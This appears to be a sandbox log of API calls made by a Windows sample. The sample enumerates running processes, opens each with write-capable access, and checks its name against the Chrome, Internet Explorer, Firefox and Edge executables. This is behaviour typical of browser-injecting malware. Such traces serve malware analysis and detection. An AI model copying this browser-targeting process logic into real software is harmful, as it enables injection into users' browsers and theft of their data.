	[0243.250] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x8b90
	[0243.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.250] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0243.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.250] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.251] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0243.251] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.251] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.251] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0243.252] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x8b94
	[0243.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.253] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0243.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.253] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.254] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0243.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.254] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.254] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0243.255] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x8b98
	[0243.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.255] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0243.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.256] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.256] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0243.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.256] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.256] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0243.257] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x8b9c
	[0243.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.258] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0243.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.258] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.258] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0243.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.259] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.259] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.260] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x8ba0
	[0243.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.260] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.261] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.261] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.261] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.261] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.262] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x8ba4
	[0243.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.262] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.263] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.263] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.263] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.264] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.264] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x8ba8
	[0243.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.264] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.265] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.265] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.265] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.266] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.266] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x8bac
	[0243.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.267] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.267] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.268] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.268] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.268] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.269] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x8bb0
	[0243.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.269] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.270] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.270] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.270] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.270] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.271] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x8bb4
	[0243.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.271] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.272] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.272] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.272] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.272] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.273] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x8bb8
	[0243.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.273] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.274] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.274] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.274] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.275] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0243.275] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x8bbc
	[0243.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.275] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0243.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.276] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.276] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0243.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.276] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.277] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.277] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x8bc0
	[0243.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.277] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.278] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.278] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.278] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.279] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0243.279] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x8bc4
	[0243.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.280] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.280] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.280] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.281] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.281] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0243.281] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x8bc8
	[0243.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.282] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0243.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.282] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.282] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0243.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.297] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.297] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.298] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x8bcc
	[0243.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.298] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.299] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.299] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.299] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.300] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0243.300] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x8bd0
	[0243.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.301] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0243.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.301] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.302] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0243.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.302] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.302] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0243.303] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x8bd4
	[0243.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.303] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0243.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.303] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.304] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0243.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.304] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.304] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0243.305] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x8bd8
	[0243.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.305] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0243.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.305] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.306] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0243.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.306] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.306] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0243.307] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x8bdc
	[0243.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.307] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0243.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.307] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.308] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0243.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.308] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.308] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0243.309] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0243.309] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0243.310] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x8be0
	[0243.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.310] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0243.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.310] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.311] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0243.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.311] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.312] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0243.313] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x8be4
	[0243.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.313] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0243.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.313] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.313] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0243.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.314] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.314] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0243.315] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x8be8
	[0243.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.315] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0243.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.316] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.316] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0243.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.316] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.317] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0243.317] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x8bec
	[0243.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.317] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0243.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.318] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.318] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0243.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.319] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.319] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0243.319] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x8bf0
	[0243.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.320] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0243.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.320] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
